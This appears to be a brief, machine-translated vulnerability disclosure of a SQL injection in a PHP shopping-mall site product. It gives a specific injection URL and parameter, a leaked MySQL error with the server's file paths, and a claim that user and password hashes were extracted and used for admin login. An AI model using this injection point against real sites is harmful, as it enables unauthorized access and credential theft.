Western Digital mall SQL injection (PHP Web finished website supermarket)

Injection Point
Http://site.west263.com/down/class/index.php? Myord = 1
 
 
Database error: Invalid SQL: select * from au_down_con where iffb = '1' and catid! = '0' order by 1 \ 'desc limit 0, 20
MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\ 'desc limit' at line 1)
#0 dbbase_ SQL-> halt (Invalid SQL: select * from au_down_con where iffb = '1' and catid! = '0' order by 1 \ 'desc limit) called at [D: \ wwwroot \ autosite \ wwwroot \ mongodes \ db. inc. php: 54] #1 dbbase_ SQL-> query (select * from {P} _ down_con where iffb = '1' and catid! = '0' order by 1 \ 'desc limit) called at [D: \ wwwroot \ autosite \ wwwroot \ down \ module \ DownQuery. php: 105] #2 DownQuery () called at [D: \ wwwroot \ autosite \ wwwroot \ mongodes \ common. inc. php: 551] #3 printpage () called at [D: \ wwwroot \ autosite \ wwwroot \ down \ class \ index. php: 11]
Warning: mysql_fetch_array (): supplied argument is not a valid MySQL result resource in D: \ wwwroot \ autosite \ wwwroot \ mongodes \ db. inc. php on line 61
Www.2cto.com
 


The user name and password hash are obtained through injection, and the user name and password are successfully entered in the background.

 
 
I will not proceed ..

Author: Data Stream